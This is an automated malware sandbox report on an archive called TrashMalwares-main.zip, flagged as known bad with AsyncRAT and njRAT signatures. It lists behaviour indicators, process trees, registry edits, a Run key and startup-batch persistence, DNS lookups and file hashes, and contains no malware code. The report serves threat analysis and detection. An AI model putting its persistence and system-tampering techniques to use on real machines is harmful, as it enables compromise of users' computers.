Analysis Overview
SHA256
f715c3d3a93c1160c490ce9277c4d2093787f383e15d3e50d034bd9eaf36d536
Threat Level: Known bad
The file TrashMalwares-main.zip was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
Njrat family
Asyncrat family
Possible privilege escalation attempt
Disables Task Manager via registry modification
Blocklisted process makes network request
Downloads MZ/PE file
Modifies Installed Components in the registry
Disables RegEdit via registry modification
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
UPX packed file
Drops startup file
Checks computer location settings
Deletes itself
Writes to the Master Boot Record (MBR)
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious behavior: CmdExeWriteProcessMemorySpam
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Modifies registry key
Delays execution with timeout.exe
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Runs regedit.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Checks processor information in registry
Analysis: static1
Detonation Overview
Reported
2024-03-02 20:28
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Asyncrat family
Njrat family
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral17
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win7-20240221-en
Max time kernel
122s
Max time network
134s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe"
Network
Files
memory/2712-0-0x0000000000400000-0x000000000042F000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
96s
Max time network
156s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Program = "C:\\TEMP\\NetPakoe3.0.exe /autorun" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A8F2.tmp\A8F3.tmp\A8F4.vbs //Nologo
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x494 0x504
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\A8F2.tmp\A8F3.tmp\A8F4.vbs
| Hash | Value |
|---|---|
| MD5 | 36072dc09cf0a99e3936b50bacd9a3e5 |
| SHA1 | 731ede51ad7869ae0b01248267b0354a5fe52cba |
| SHA256 | a8dd0c012506f5ec41f90909e88de316ce3cbdb294db2b925c832af104e8b94f |
| SHA512 | c4d9858e67295ef124218e2493e9990427df16bc722df621ffebbcc4229e270f42fbccd9a2376448c19319ab18c1982f6d9a7371a77c148d434a64b8fe0a874d |
Analysis: behavioral26
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
40s
Max time network
183s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
